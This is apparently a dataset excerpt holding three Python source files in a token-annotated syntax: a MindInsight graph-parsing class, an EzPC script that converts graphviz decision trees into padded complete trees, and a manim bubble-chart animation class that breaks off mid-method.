content stringlengths 0 1.55M |
|---|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""This file is used to define the MindSpore graph."""<import_from_stmt>collections defaultdict<import_from_stmt>mindinsight.datavisual.common.log logger<import_from_stmt>mindinsight.datavisual.data_transform.graph.msgraph MSGraph<import_from_stmt>mindinsight.domain.graph.base NodeTypeEnum<class_stmt>OptimizedGraph(MSGraph)<block_start>"""The object describes the MindSpore graph, and it is defined in the anf_ir proto file."""<line_sep>MIN_GROUP_NODE_COUNT=10<def_stmt>__init__ self<block_start>super().__init__()<line_sep>self._load_node_temp_cache={}<block_end><def_stmt>_inherit_input_output_from_subnode self parent_node subnode_list filtered_type=<none><block_start>"""
Adds the input and output of all direct child nodes to the current node.
Args:
parent_node (Node): The nodes that inherit the input and output of the child nodes.
subnode_list (list[Node]): A list of child nodes that are inherited from the input and output.
filtered_type (set(str)): Filter some input and output that do not require inheritance
based on the node type. Default is filter const node.
Note:
- Only the inputs and outputs of the external scope are inherited.
- Before add_const_node method, if the input is a const,
the scope of the const node is not startswith the name of parent node.
So in this scenario, we need to filter the const nodes.
"""<line_sep>filtered_type={NodeTypeEnum.CONST.value}<if>filtered_type<is><none><else>filtered_type<for_stmt>method ['inputs' 'outputs' 'proxy_inputs' 'proxy_outputs']<block_start><for_stmt>node subnode_list<block_start><for_stmt>item_name,item_attr getattr(node method).items()<block_start>target_node=self._get_normal_node(node_name=item_name)<if_stmt>target_node<is><none><block_start>logger.warning("inherit %s from subnode, target node (%s) is None" method item_name)<line_sep><continue><block_end><if_stmt>item_name.startswith(f'{parent_node.name}/')<block_start><continue><block_end><if_stmt>target_node.type<in>filtered_type<block_start><continue><block_end>getattr(parent_node f'add_{method}')(item_name item_attr)<block_end><block_end><block_end><block_end><def_stmt>_cache_node self node<block_start>"""Store the node in the cache."""<line_sep># Notice:
# The additional caching is used to handle the Const, Parameter and LOAD nodes separately later.
super()._cache_node(node)<if_stmt>node.type<eq>NodeTypeEnum.LOAD.value<block_start>self._load_node_temp_cache.update({node.name:node})<block_end><block_end><def_stmt>_delete_nodes_of_cache self node_names<block_start>"""Delete node from cache."""<line_sep>logger.debug("These nodes will be removed from the cache, node names: %s." node_names)<for_stmt>name node_names<block_start><if_stmt>self._parameter_node_temp_cache.get(name)<block_start>self._parameter_node_temp_cache.pop(name)<block_end><if_stmt>self._const_node_temp_cache.get(name)<block_start>self._const_node_temp_cache.pop(name)<block_end><if_stmt>self._load_node_temp_cache.get(name)<block_start>self._load_node_temp_cache.pop(name)<block_end>node=self._get_normal_node(node_name=name)<line_sep>self._normal_node_map.pop(name)<line_sep>self._node_id_map_name.pop(node.node_id)<block_end><block_end><def_stmt>_parse_data self proto_data<block_start>"""
The proto data is parsed and all nodes are stored in the specified structure.
Args:
proto_data (anf_ir_pb2.GraphProto): Refer to anf_ir_pb2.GraphProto object.
"""<line_sep>logger.info("Start to parse graph proto data.")<line_sep>self._parse_op_nodes(proto_data.node)<line_sep>self._parse_parameters(proto_data.parameters)<line_sep>self._parse_consts(proto_data.const_vals)<line_sep>self._update_input_after_create_node()<line_sep>self._update_output_after_create_node()<line_sep>self._delete_non_computational_ops()<line_sep>self._clean_no_input_output_node()<line_sep>self._extract_node_by_single_node_in_scope()<line_sep>logger.info("Parse proto data end, normal node count(only contain op node, "<concat>"parameter, const): %s." self.normal_node_count)<block_end><def_stmt>_parse_op_nodes self node_protos<block_start>"""
Parse `anf_ir_pb2.NodeProto` object, and create a normal node.
Args:
node_protos (list[anf_ir_pb2.NodeProto]): Refer to anf_ir_pb2.NodeProto.
"""<line_sep>logger.debug("Start to parse op nodes from proto.")<for_stmt>topological_index,node_proto enumerate(node_protos)<block_start><if_stmt><not>node_proto.name<block_start>logger.warning("Finding a node with an empty name will not save it.")<line_sep><continue><block_end><if_stmt>node_proto.full_name.startswith("Gradients")<or>"optimizer"<in>node_proto.full_name<or>"opt"<in>node_proto.instance_name<block_start><continue><block_end>self._parse_op_node(topological_index node_proto)<block_end><block_end><def_stmt>_update_input_after_create_node self<block_start>"""Update the input of node after create node."""<for_stmt>node self._normal_node_map.values()<block_start><for_stmt>src_node_id,input_attr dict(node.inputs).items()<block_start>node.delete_inputs(src_node_id)<if_stmt><not>self._is_node_exist(node_id=src_node_id)<block_start><continue><block_end>src_node=self._get_normal_node(node_id=src_node_id)<line_sep>input_attr['shape']=src_node.output_shape<line_sep>input_attr['data_type']=src_node.output_data_type<line_sep>node.add_inputs(src_name=src_node.name input_attr=input_attr)<block_end><block_end>nodes=self._list_nodes_without_parameter_const()<for_stmt>node nodes<block_start><for_stmt>src_node_name,_ dict(node.inputs).items()<block_start><if_stmt><not>self._is_node_exist(node_name=src_node_name)<block_start>logger.warning("Source node (%s) is None." src_node_name)<line_sep><continue><block_end>src_node=self._get_normal_node(node_name=src_node_name)<if_stmt>src_node.type<in>(NodeTypeEnum.LOAD.value NodeTypeEnum.TUPLE_GET_ITEM.value NodeTypeEnum.MAKETUPLE.value NodeTypeEnum.UPDATE_STATE.value)<block_start>node.delete_inputs(src_node_name)<for_stmt>source_node_name,source_attr dict(src_node.inputs).items()<block_start>source_node=self._get_normal_node(node_name=source_node_name)<if_stmt>source_node<is><none><block_start>logger.warning("Source node (%s) is None." source_node_name)<line_sep><continue><block_end>source_attr['shape']=source_node.output_shape<line_sep>source_attr['data_type']=source_node.output_data_type<line_sep>node.add_inputs(src_name=source_node.name input_attr=source_attr)<block_end><block_end><block_end><block_end><block_end><def_stmt>_update_output_after_create_node self<block_start>"""Update the output of node after create node."""<line_sep>super()._update_output_after_create_node()<line_sep>nodes=self._list_nodes_without_parameter_const()<for_stmt>node nodes<block_start><for_stmt>src_node_name,_ dict(node.outputs).items()<block_start><if_stmt><not>self._is_node_exist(node_name=src_node_name)<block_start>logger.warning("Source node (%s}) is None." src_node_name)<line_sep><continue><block_end>src_node=self._get_normal_node(node_name=src_node_name)<if_stmt>src_node.type<in>(NodeTypeEnum.LOAD.value NodeTypeEnum.TUPLE_GET_ITEM.value NodeTypeEnum.MAKETUPLE.value NodeTypeEnum.UPDATE_STATE.value)<block_start>node.delete_outputs(src_node_name)<for_stmt>source_node_name,source_attr dict(src_node.outputs).items()<block_start>source_node=self._get_normal_node(node_name=source_node_name)<if_stmt>source_node<is><none><block_start>logger.warning("Source node (%s) is None." source_node_name)<line_sep><continue><block_end>source_attr['shape']=source_node.output_shape<line_sep>source_attr['data_type']=source_node.output_data_type<line_sep>node.add_outputs(src_name=source_node.name output_attr=source_attr)<block_end><block_end><block_end><block_end><block_end><def_stmt>_delete_non_computational_ops self<block_start>"""Deleted non-computational operators."""<line_sep>delete_names=[]<for_stmt>node self._normal_node_map.values()<block_start><if_stmt>node.type<in>(NodeTypeEnum.LOAD.value NodeTypeEnum.TUPLE_GET_ITEM.value NodeTypeEnum.MAKETUPLE.value NodeTypeEnum.UPDATE_STATE.value)<block_start>delete_names.append(node.name)<block_end><block_end>self._delete_nodes_of_cache(delete_names)<block_end><def_stmt>_list_nodes_without_parameter_const self<block_start>"""List nodes without parameter and const node."""<line_sep>nodes=self._normal_node_map.values()<line_sep>not_expect_type=(NodeTypeEnum.CONST.value NodeTypeEnum.PARAMETER.value)<line_sep>nodes=filter(<lambda>node:node.type<not><in>not_expect_type nodes)<line_sep>nodes=sorted(nodes key=<lambda>node:node.topological_index)<line_sep><return>nodes<block_end><def_stmt>_extract_node_by_single_node_in_scope self<block_start>"""Extract node from the scope which has only one node."""<line_sep>nodes=self._list_nodes_without_parameter_const()<line_sep>scope_map_types=defaultdict(set)<line_sep>scope_map_node_cnt=defaultdict(int)<for_stmt>node nodes<block_start><if_stmt><not>node.scope<or>'/'<not><in>node.scope<block_start><continue><block_end>scope_map_types[node.scope].add(node.type)<line_sep>scope_map_node_cnt[node.scope]<augadd>1<block_end>filter_scopes=set()<for_stmt>scope,types scope_map_types.items()<block_start><if_stmt>len(types)<eq>1<and>scope_map_node_cnt[scope]<g>1<and>types.pop()<in>scope<block_start>filter_scopes.add(scope)<block_end><block_end><for_stmt>filter_scope list(filter_scopes)<block_start><for_stmt>scope scope_map_types<block_start><if_stmt>scope.startswith(f'{filter_scope}/')<block_start>filter_scopes.remove(filter_scope)<line_sep><break><block_end><block_end><block_end><if_stmt><not>filter_scopes<block_start><return><block_end><for_stmt>node nodes<block_start><if_stmt>node.scope<in>filter_scopes<and>'/'<in>node.scope<block_start>name=node.name.rsplit('/' 1)[1]<line_sep>new_scope=node.scope.rsplit('/' 1)[0]<line_sep>new_name=f'{new_scope}/{name}'<line_sep>self._update_node_name_of_cache(node new_name)<block_end><block_end><return><block_end><def_stmt>_clean_no_input_output_node self<block_start>"""Clean nodes which has no input and output."""<line_sep>nodes=self._list_nodes_without_parameter_const()<line_sep>deleted_names=[]<for_stmt>node nodes<block_start><if_stmt><not>node.inputs<and><not>node.outputs<block_start>deleted_names.append(node.name)<block_end><block_end>self._delete_nodes_of_cache(deleted_names)<block_end><block_end> |
"""
Authors: <NAME>, <NAME>.
Copyright:
Copyright (c) 2021 Microsoft Research
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""<line_sep>"""
This python file takes in a graphviz text file,
creates a tree in memory and outputs the tree's
characteristic (feature and threshold at each node)
where it is ASSUMED that initially each node of
the tree is either leaf or it has 2 children.
This file also takes care of adding dummy nodes
to create a new funtionally equivalent complete
binary tree to be used by EzPC code.
"""<import_stmt>math<import_stmt>os<class_stmt>TreeNode(object)<block_start><def_stmt>__init__ self<block_start>self.left=<none><line_sep>self.right=<none><line_sep>self.value=0<line_sep>self.feature=-1<line_sep>self.depth=-1<block_end><block_end><def_stmt>fill_recur ctx features threshold depth<block_start>ctx.max_depth=max(ctx.max_depth depth)<if_stmt>features[ctx.ctr]<eq>-1# Leaf Node
<block_start>node=TreeNode()<line_sep>node.value=threshold[ctx.ctr]<line_sep>node.depth=depth<line_sep>ctx.ctr<augadd>1<line_sep><return>node<block_end><else_stmt><block_start>node=TreeNode()<line_sep>node.value=threshold[ctx.ctr]<line_sep>node.feature=features[ctx.ctr]<line_sep>node.depth=depth<line_sep>ctx.ctr<augadd>1<line_sep>node_left=fill_recur(ctx features threshold depth+1)<line_sep>node_right=fill_recur(ctx features threshold depth+1)<line_sep>node.left=node_left<line_sep>node.right=node_right<line_sep><return>node<block_end><block_end><def_stmt>is_internal node<block_start><if_stmt>node.feature<eq>-1<block_start><return><false><block_end><else_stmt><block_start><return><true><block_end><block_end><def_stmt>get_to_pad_subtree ctx node depth_diff<block_start><if_stmt>depth_diff<eq>1# New leafs
<block_start>node_left=TreeNode()<line_sep>node_right=TreeNode()<line_sep>node_left.value=node.value<line_sep>node_right.value=node.value<line_sep>node_left.depth=ctx.max_depth+1-depth_diff<line_sep>node_right.depth=ctx.max_depth+1-depth_diff<line_sep>node.left=node_left<line_sep>node.right=node_right<line_sep>node.feature=1<line_sep>node.value=0.0<line_sep><return>node<block_end><else_stmt><block_start>node_left=TreeNode()<line_sep>node_right=TreeNode()<line_sep>node_left.value=node.value<line_sep>node_right.value=node.value<line_sep>node_left.feature=node.feature<line_sep>node_right.feature=node.feature<line_sep>node_left.depth=ctx.max_depth+1-depth_diff<line_sep>node_right.depth=ctx.max_depth+1-depth_diff<line_sep>node_left=get_to_pad_subtree(ctx node_left depth_diff-1)<line_sep>node_right=get_to_pad_subtree(ctx node_right depth_diff-1)<line_sep>node.left=node_left<line_sep>node.right=node_right<line_sep>node.feature=1<line_sep>node.value=0.0<line_sep><return>node<block_end><block_end><def_stmt>pad_to_complete_tree ctx node<block_start><if_stmt><not>is_internal(node)# Leaf node
<block_start><if_stmt>node.depth<ne>ctx.max_depth# Needs padding
<block_start>node=get_to_pad_subtree(ctx node ctx.max_depth-node.depth)<block_end><block_end><else_stmt><block_start>pad_to_complete_tree(ctx node.left)<line_sep>pad_to_complete_tree(ctx node.right)<block_end><block_end><def_stmt>dump_complete_tree ctx root<block_start>queue=[root]<line_sep>ctr_local=0<while_stmt>ctr_local<l>ctx.nodes_in_complete_tree<block_start>current_node=queue[ctr_local]<line_sep>ctr_local<augadd>1<if_stmt>is_internal(current_node)<block_start>ctx.ezpc_features.append(current_node.feature)<line_sep>ctx.ezpc_threshold.append(current_node.value)<line_sep>ctx.ezpc_depth.append(current_node.depth)<line_sep>queue.append(current_node.left)<line_sep>queue.append(current_node.right)<block_end><else_stmt><block_start>ctx.ezpc_features.append(-1)<line_sep>ctx.ezpc_threshold.append(current_node.value)<line_sep>ctx.ezpc_depth.append(current_node.depth)<block_end><block_end><block_end><def_stmt>parse_graphviz_to_ezpc_input tree_file_path task scaling_factor<block_start><with_stmt>open(tree_file_path "r")<as>f<block_start>lines=f.readlines()<block_end>lines=lines[1:]<line_sep>depth=0<line_sep>nodes_this_tree=0<line_sep>features=[]<line_sep>threshold=[]<for_stmt>i range(len(lines))<block_start>curline=lines[i]<line_sep># print("processing :", curline)
start_location=curline.find('"')<line_sep>start_location<augadd>1<if_stmt>start_location<eq>0<block_start><break><block_end>nodes_this_tree<augadd>1<if_stmt>curline[start_location]<eq>"X"# This is an internal node
<block_start>end_location_feature=curline.find("]")<line_sep>start_location_th=curline.find("<=")<line_sep>end_location_th=curline.find("\\n")<line_sep>feature_val=int(curline[start_location+2:end_location_feature])<line_sep>threshold_val=float(curline[start_location_th+3:end_location_th])<line_sep>features.append(feature_val)<line_sep>threshold.append(threshold_val)<line_sep># print("Internal Node")
# print(feature_val)
# print(threshold_val)
<block_end><else_stmt># This is a leaf
<block_start>start_location_val=-1<if_stmt>task<eq>"reg"<block_start>start_location_val=curline.find("value =")<block_end><else_stmt><block_start>start_location_val=curline.find("class =")<block_end><assert_stmt>start_location_val<ne>-1 ("Task specified: "+task+" may be incorrect!")<line_sep>end_location_val=curline.find('" filled')<line_sep>output_val=float(curline[start_location_val+7:end_location_val])<line_sep>features.append(-1)<line_sep>threshold.append(output_val)<line_sep># print("Leaf Node")
# print(output_val)
<block_end><block_end><class_stmt>Context(object)<block_start><def_stmt>__init__ self<block_start>self.ctr=0<line_sep>self.ezpc_features=[]<line_sep>self.ezpc_threshold=[]<line_sep>self.ezpc_depth=[]<line_sep>self.max_depth=-1<line_sep>self.nodes_in_complete_tree=-1<block_end><block_end>ctx=Context()<line_sep>root=fill_recur(ctx features threshold 1)<line_sep>ctx.nodes_in_complete_tree=pow(2 ctx.max_depth)-1<line_sep># if nodes_in_complete_tree != nodes_this_tree:
# print("[PADDING] Input tree not complete. Padding to make complete.")
# else:
# print("Input tree already complete. No need to pad.")
pad_to_complete_tree(ctx root)<line_sep>dump_complete_tree(ctx root)<line_sep>model_weights="weight_sf_"+str(scaling_factor)+".inp"<line_sep>ezpc_tree_path=os.path.join(os.path.dirname(tree_file_path) model_weights)<line_sep># print("Writing to " + ezpc_tree_path)
# print("[FLOAT TO FIXED] Scaling by 2^" + str(scaling_factor) + " times")
<with_stmt>open(ezpc_tree_path "a")<as>output_file<block_start><for_stmt>i range(len(ctx.ezpc_features))<block_start>output_file.write(str(ctx.ezpc_features[i])+"\n")<block_end><for_stmt>i range(len(ctx.ezpc_threshold))<block_start>output_file.write(str(int(math.floor((2<power>scaling_factor)<times>ctx.ezpc_threshold[i])))+"\n")<block_end><block_end><return>ctx.max_depth<block_end> |
<import_from_stmt>manimlib.imports *<import_from_stmt>Danim.BubbleChart.BCutils *<import_from_stmt>Danim.BubbleChart.bubble_constants *<class_stmt>BubbleChart(VGroup)# A class to quickly create the bubble chart animation
# may not have the freedom to change things
<block_start>CONFIG={"show_axes_lable":SHOW_AXIS_LABLES #default True
"show_time_lable":<true> # names to show are stored in SHOWN_ENTITY_NAMES
"show_color_lables":<true> # default group names
"set_bubble_colors":"randomly" # two options: "by_group" or "randomly"
"x_axis_lable":X_AXIS_LABLE "y_axis_lable":Y_AXIS_LABLE "show_creation":<false>}<def_stmt>__init__ self X Y R entity_names T **kwargs#CONFIG to attributes
<block_start>digest_config(self kwargs)<line_sep>self.entity_names=entity_names<line_sep>self.times=T<line_sep>#create axes
(self.axes_config self.axes)=import_data_and_set_axes(X Y)<line_sep>#transform X,Y,R into screen coordinates
self.coordinates,self.radiusdata=transform_from_data_to_screencoordinates(X Y R self.axes)<line_sep>#set the colors of bubbles:
#COLORMAT is a list of shape(num_of_bubbles,1)
#each element is a color array
self.COLORMAT=self.generate_colormatrix()<if_stmt><not>self.show_creation#set the bubble to the start time
<block_start>self.bubbles=set_up_the_bubbles(self.coordinates[: 0] self.radiusdata[: 0] self.axes color_mat=self.COLORMAT)<line_sep>#create lables
self.lables_creation()<line_sep>VGroup.__init__(self **kwargs)<line_sep>self.add(self.axes self.bubbles self.lables)<block_end><else_stmt><block_start>self.lables_creation()<line_sep>VGroup.__init__(self **kwargs)<line_sep>self.add(self.axes self.lables)<line_sep>#the bubbles and will be created later
#using animation method self.Get_Creation_Animation(directly_show_creation = False)
<block_end><block_end><def_stmt>get_current_timeindex self<block_start><return>self.times.index(self.time_lable.get_tex_string())<block_end><def_stmt>generate_colormatrix self colors=<none># the color of each bubbles can be set by some group lables
# for example: if each bubble represents a contry, then
# you can set all the contry in Asia as red bubbles,
# North American Contries as blue bubbles
# you need a cvs file called the "Group_lable.csv" to store each tags
# or you can just put a dic to represents that relationship
<block_start><if_stmt>self.set_bubble_colors<eq>"by_group"#generate color matrices with default color red
<block_start>COLORMAT=[RED]<times>self.coordinates.shape[0]<line_sep>#read information from "Group_lable.csv"
group_lable_data=np.array(pd.DataFrame(pd.read_csv(GROUP_LABLE_CSV_FILE encoding="gbk" index_col=0) index=self.entity_names))<line_sep>#check whether the numbers of rows are the same
<assert_stmt>(len(COLORMAT)<eq>group_lable_data.shape[0])<line_sep>self.group_index=[]<line_sep>#match color to COLORMAT with relationship in COLOR_LABLE_DICT
<for_stmt>i,lable enumerate(group_lable_data)<block_start><if_stmt>lable[0]<in>COLOR_LABLE_DICT<block_start>COLORMAT[i]=COLOR_LABLE_DICT[lable[0]]<line_sep>self.group_index.append(COLOR_LABLE_INDEX_DICT[lable[0]])<block_end><block_end><block_end>#generate color randomly
<elif_stmt>self.set_bubble_colors<eq>"randomly"<block_start>COLORMAT=[]<for_stmt>i range(0 self.coordinates.shape[0]+1)<block_start>COLORMAT.append(random_color())<block_end><block_end><else_stmt><block_start>COLORMAT=[RED<times>self.coordinates.shape[0]]<block_end><return>COLORMAT<block_end><def_stmt>lables_creation self#lable creation:
<block_start>self.lables=VGroup()<if_stmt>self.show_axes_lable#Create the x_axis_lable
<block_start>self.lables.add((TextMobject(self.x_axis_lable color=TEXT_COLOR).scale(TEXT_SCALE_FACTOR)).shift(self.axes.x_axis.number_to_point(self.axes.x_axis.x_max)+X_LABLE_ADJUST_VECTOR))<line_sep>#create the y_axis_lable:
self.lables.add((TextMobject(self.y_axis_lable color=TEXT_COLOR).scale(TEXT_SCALE_FACTOR)).shift(self.axes.y_axis.number_to_point(self.axes.y_axis.x_max)+Y_LABLE_ADJUST_VECTOR))<block_end>#create the time lable
<if_stmt>self.show_time_lable<block_start>self.time_lable=(TextMobject(str(self.times[0]) color=TIME_LABLE_COLOR).scale(TIME_LABLE_SCALE_FACTOR)).shift(TIME_LABLE_POSITION)<line_sep>#self.lables.add(self.time_lable)
<block_end>#create color lables(with rectangles)
<if_stmt>self.show_color_lables<and>(<not>self.show_creation)<block_start>entity_color_map=dict(dict(zip(self.entity_names self.COLORMAT)) **COLOR_LABLE_DICT)<line_sep>self.color_lables=VGroup()<for_stmt>i,entity enumerate(SHOWN_ENTITY_NAMES)<block_start><if_stmt>entity<in>entity_color_map<block_start>rect=Rectangle(height=RECT_HIGHT width=RECT_WIDTH color=entity_color_map[entity] fill_opacity=1)<if_stmt>SHOW_CN_NAMES<block_start>name_to_show=online_translation(entity)<line_sep>rect_name=TextMobject(name_to_show).scale(RECT_TEXT_SCALE_FACTOR)<block_end><else_stmt><block_start>rect_name=TextMobject(entity).scale(RECT_TEXT_SCALE_FACTOR)<block_end><if_stmt>i<eq>0<block_start>rect.shift(RECT_POSITION)<line_sep>rect_name.next_to(rect RIGHT)<block_end><else_stmt><block_start>rect.align_to(self.color_lables direction=LEFT+DOWN)<line_sep>rect.shift(DOWN<times>RECT_HIGHT<times>RECT_INTERVAL_FACTOR)<line_sep>rect_name.next_to(rect RIGHT)<block_end>self.color_lables.add(rect rect_name)<block_end><block_end>self.lables.add(self.color_lables)<block_end><block_end><def_stmt>Get_Creation_Animation self directly_show_creation=<true> maximum_circles_to_show=50 creation_time_index=0 initial_position=3<times>UP+3<times>RIGHT<block_start>creation_time=self.times[creation_time_index]<line_sep>#Show Creation all together
<if_stmt>directly_show_creation<block_start>self.lables_creation()<line_sep>#self.add(self.lables)
<return>ShowCreation(self run_time=CREATION_RUN_TIME)<block_end>#Show creaton with all name listed
<else_stmt><block_start>self.color_lables=VGroup()<line_sep>old_bubbles=[]<line_sep>transfered_bubbles=[]<line_sep>name_lables=[]<line_sep>self.circle_index=[]<line_sep>self.bubbles=VGroup()<line_sep>self.grow_animation=[]<line_sep>self.transfer_animation=[]<line_sep>self.color_lables_animation=[]<def_stmt>generate_circle_matrix indices#indices is the relative index
#position in self.entity_names
<block_start>new_entity=[]<line_sep>y0=self.axes.x_axis.number_to_point(self.axes.x_axis.x_max)[1]<for_stmt>i,name enumerate(self.entity_names)<block_start><if_stmt>i<in>indices<block_start>new_entity.append(name)<block_end><block_end><if_stmt><not>len(old_bubbles)<eq>0<block_start>start_index=len(old_bubbles)<block_end><else_stmt><block_start>start_index=0<block_end><for_stmt>j,name enumerate(new_entity)#old_bubble creation
<block_start><if_stmt>j<eq>0<block_start>previous_index=start_index<line_sep>cornor_index=start_index<line_sep>old_bubbles.append(set_up_the_bubbles(initial_position self.radiusdata[indices[j] creation_time_index] self.axes self.COLORMAT[indices[j]] mode='single'))<block_end><else_stmt><block_start>old_bubbles.append(set_up_the_bubbles(np.array([0 0 0]) self.radiusdata[indices[j] creation_time_index] self.axes self.COLORMAT[indices[j]] mode='single'))<block_end>#name_lable creation
<if_stmt>SHOW_CN_NAMES<block_start>name_shown=online_translation(name)<block_end><else_stmt><block_start>name_shown=name<block_end>name_lables.append(TextMobject(name_shown).scale(NAME_TEXT_SCALE_FACTOR))<line_sep>name_lables[-1].next_to(old_bubbles[-1] RIGHT)<line_sep>#check if circle matrix reaches the bottom
height=old_bubbles[-1].get_critical_point(UP)[1]-old_bubbles[-1].get_critical_point(DOWN)[1]<line_sep>cell=old_bubbles[previous_index].get_critical_point(DOWN)[1]<if_stmt><not>j<eq>0<block_start>current_VGroup=VGroup(old_bubbles[-1] name_lables[-1])<line_sep># if the curreny circle touches the bottom:
<if_stmt>cell-height<l>y0+0.5<block_start>current_VGroup.next_to(old_bubbles[cornor_index] LEFT)<line_sep>current_VGroup.shift(0.25<times>LEFT)<line_sep>cornor_index=len(old_bubbles)-1<block_end># if the curreny circle does not touch the bottom:
<else_stmt><block_start>current_VGroup.next_to(previous_VGroup DOWN)<block_end><block_end>#transfered_bubbles creation:
transfered_bubbles.append(set_up_the_bubbles(self.coordinates[indices[j] creation_time_index] self.radiusdata[indices[j] creation_time_index] self.axes self.COLORMAT[indices[j]] mode='single'))<line_sep>#record the circle index
self.circle_index.append(indices[j])<line_sep>#append the animation
self.grow_animation.append(AnimationGroup(FadeIn(old_bubbles[-1]) Write(name_lables[-1]) run_time=SINGLE_GROW_RUN_TIME))<line_sep>self.transfer_animation.append(AnimationGroup(ReplacementTransform(old_bubbles[-1] transfered_bubbles[-1]) FadeOut(name_lables[-1]) run_time=SINGLE_TRANSFER_TIME))<line_sep>previous_index=len(old_bubbles)-1<line_sep>previous_VGroup=VGroup(old_bubbles[-1] name_lables[-1])<block_end><block_end><if_stmt>self.set_bubble_colors<eq>"randomly"<block_start>indices=[]<for_stmt>i,name enumerate(self.entity_names)<block_start>indices.append(i)<block_end>quotient=len(self.entity_names)<floordiv>maximum_circles_to_show<line_sep>remainder=len(self.entity_names)%maximum_circles_to_show<for_stmt>i range(quotient)<block_start>generate_circle_matrix(indices[maximum_circles_to_show<times>(i):maximum_circles_to_show<times>(i+1)])<block_end>#generate_circle_matrix(indices[maximum_circles_to_show*(i+1):len(self.entity_names)])
self.bubbles=VGroup(*transfered_bubbles)<block_end>#if set bubbles by group
#usurally with self.show_color_lables = True:
<else_stmt><block_start><if_stmt>self.show_color_lables<block_start>entity_color_map=dict(dict(zip(self.entity_names self.COLORMAT)) **COLOR_LABLE_DICT)<block_end>self.indices=[]<for_stmt>i,entity enumerate(SHOWN_ENTITY_NAMES)<block_start><if_stmt>entity<in>entity_color_map<block_start>rect=Rectangle(height=RECT_HIGHT width=RECT_WIDTH color=entity_color_map[entity] fill_opacity=1)<if_stmt>SHOW_CN_NAMES<block_start>name_to_show=online_translation(entity)<line_sep>rect_name=TextMobject(name_to_show).scale(RECT_TEXT_SCALE_FACTOR)<block_end><else_stmt><block_start>rect_name=TextMobject(entity).scale(RECT_TEXT_SCALE_FACTOR)<block_end><if_stmt>i<eq>0<block_start>rect.shift(RECT_POSITION)<line_sep>rect_name.next_to(rect RIGHT)<block_end><else_stmt><block_start>rect.align_to(self.color_lables direction=LEFT+DOWN)<line_sep>rect.shift(DOWN<times>RECT_HIGHT<times>RECT_INTERVAL_FACTOR)<line_sep>rect_name.next_to(rect RIGHT)<block_end>self.color_lables_animation.append(AnimationGroup(FadeIn(rect) Write(rect_name)))<line_sep>self.color_lables.add(rect rect_name)<line_sep>indice=[]<for_stmt>j,name enumerate(self.entity_names)<block_start><if_stmt>self.COLORMAT[j]<eq>COLOR_LABLE_DICT[entity]<block_start>indice.append(j)<block_end><block_end>generate_circle_matrix(indice)<line_sep>self.indices.append(indice)<block_end><block_end><def_stmt>sort_by_index listA index_list<block_start><assert_stmt>(len(listA)<eq>len(index_list))<line_sep>new_list=[]<for_stmt>z,element enumerate(listA)<block_start>new_list.append(listA[index_list[z]])<block_end><return>new_list<block_end>index_list=[]<for_stmt>indice self.indices<block_start>index_list=index_list+indice<block_end>new_bubbles=sort_by_index(transfered_bubbles index_list)<line_sep>#self.bubbles = VGroup()
<for_stmt>bubble new_bubbles<block_start>self.bubbles.add(bubble)<block_end><block_end>#self.lables.add(self.color_lables)
self.add(self.bubbles)<line_sep>#sort the animation by data index
#originally theanimation list is sort by creation order
<block_end><block_end><def_stmt>Get_Hightlight_Animation self names_to_show #list of str, must be elements in self.entity_names
wait_time=<none> #a number or list of numbers, lens must match the number of entities
intersection_wait_time=1 directions=<none> #directions is a list of direction vectors,
#lens must match the number of entities,
#if none, lables will choose
lable_sizes=<none> #lable_sizes is a list of numbers indicating the size of each lable
#lens must match the number of entities to show
wiggle_time=<none> wiggle_factor=<none> fadeout_time=<none> current_time_index=0 fadeout_at_once=<false>#
<block_start><if_stmt>isinstance(names_to_show list)<block_start>numbers_of_entities=len(names_to_show)<block_end><else_stmt><block_start>numbers_of_entities=1<block_end><if_stmt>directions<is><none><block_start>directions=[UP]<times>numbers_of_entities<block_end><if_stmt>wiggle_factor<is><none><block_start>wiggle_factor=[1.5]<times>numbers_of_entities<block_end><if_stmt>wiggle_time<is><none><block_start>wiggle_time=[1.5]<times>numbers_of_entities<block_end><if_stmt>lable_sizes<is><none><block_start>lable_sizes=[0.7]<times>numbers_of_entities<block_end><if_stmt>fadeout_time<is><none><block_start>fadeout_time=[1]<times>numbers_of_entities<block_end><if_stmt>wait_time<is><none><block_start>wait_time=[1]<times>numbers_of_entities<block_end>old_lables=[]<line_sep>new_lables=[]<line_sep>indices=[]<line_sep>animation=[]<line_sep>#TODO: add empty animation more efficiently
#Currently I add empty animation the dumb way!
#add a black dot outside the screen!
#I don't know how to add empty
